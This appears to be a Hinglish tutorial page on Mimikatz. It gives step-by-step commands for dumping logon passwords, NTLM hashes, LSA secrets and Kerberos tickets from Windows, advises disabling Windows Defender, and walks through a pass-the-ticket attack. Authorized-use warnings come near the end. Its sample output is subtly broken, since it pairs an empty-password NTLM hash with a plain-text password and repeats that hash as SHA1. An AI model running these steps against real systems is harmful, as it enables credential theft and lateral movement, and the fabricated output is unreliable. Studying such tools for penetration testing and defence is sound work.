Mimikatz

Credentials Extractor

🔑 Mimikatz क्या है?

Mimikatz एक powerful post-exploitation tool है जो Windows systems से passwords, hashes, tickets और other credentials को extract कर सकता है। यह system में already compromised होने के बाद use होता है।

👉 Post-exploitation phase में यह सबसे dangerous और useful tools में से एक है।

🔍 Mimikatz क्या-क्या कर सकता है

Password Extraction

Plain text passwords निकालना

Hash Dump

NTLM hashes extract करना

Kerberos Tickets

Pass-the-ticket attacks

LSA Dump

Local Security Authority secrets

DPAPI Master Keys

Decrypt saved credentials

Privilege Escalation

Token impersonation

⚙️ Windows में Mimikatz install

GitHubInstallation Steps

Download from GitHub (Latest Release)

https://github.com/gentilkiwi/mimikatz/releases

Extract ZIP file

mimikatz_trunk.zip → Extract folder

Run as Administrator

Right-click mimikatz.exe → Run as Administrator

👉 Note: Windows Defender इसे detect करेगा - testing के लिए disable करना पड़ सकता है

💻 Basic Commands (Use)

👉 Mimikatz interactive shell में commands:

Enter Mimikatz Shell

mimikatz.exe

Get Debug Privilege (Required)

privilege::debug

List Loaded Modules

module::list

Extract Logon Passwords

sekurlsa::logonpasswords

Dump LSA Secrets

lsadump::lsa /patch

Export Kerberos Tickets

kerberos::list /export

Exit

exit

🌐 Real Example (Practical समझ)

Example🎯 Password Extraction
privilege::debug
sekurlsa::logonpasswords

👉 यह command system में logon किए हुए users के passwords extract करता है (plain text और hash दोनों)

📊 Output समझो

मान लो output कुछ ऐसा आता है:

Authentication Id : 0 ; 286418 (00000000:00045eaa)
Session : Interactive from 1
User Name : Administrator
Domain : WORKSTATION
LM Hash : aad3b435b51404eeaad3b435b51404ee
NTLM Hash : 31d6cfe0d16ae931b73c59d7e0c089c0
SHA1 Hash : 31d6cfe0d16ae931b73c59d7e0c089c0
Password : P@ssw0rd123

🧠 इसका मतलब:

User

Administrator account

Domain: WORKSTATION

Hashes

LM & NTLM Hashes

Password cracking के लिए

Password

Plain text password

P@ssw0rd123 - Direct access

👉 इससे attacker को मिलता है:

  • • Plain text password (direct login possible)
  • • Password hashes (cracking/spraying के लिए)
  • • Domain user details (lateral movement)

🔥 Advanced Example - Pass-the-Ticket Attack

Export Kerberos Tickets

kerberos::list /export

Import Ticket (on target)

kerberos::ptt ticket.kirbi

👉 Attack flow:

Extract

User ticket

Transfer

Copy to attacker

Inject

Use ticket

👉 Pass-the-ticket से attacker user की तरह access पा सकता है बिना password के

⚠️ Important Warning

Mimikatz का use केवल authorized systems पर और proper permission के साथ करो

🚨 Critical Points:

  • Illegal: बिना permission किसी भी system पर use करना cyber crime है
  • Antivirus Detection: Windows Defender और AV solutions इसे immediately detect करते हैं
  • Requires Admin: यह tool administrator privileges के साथ ही run होता है
  • Educational Purpose: अपना test lab / VM / authorized systems पर ही practice करो

📌 Legal Note: यह tool security testing और incident response के लिए है, malicious use punishable offense है

🧩 Related Tools

Empire

Post-exploitation framework

PowerSploit

PowerShell exploitation toolkit

LaZagne

Password recovery tool

Rubeus

Kerberos attacks tool

💡 Simple समझ

Mimikatz = "Key का Master"

यह Windows से सभी तरह के keys (passwords, hashes, tickets) निकालने में master है। System में एक बार घुसने के बाद, यह आपको admin access दिला सकता है।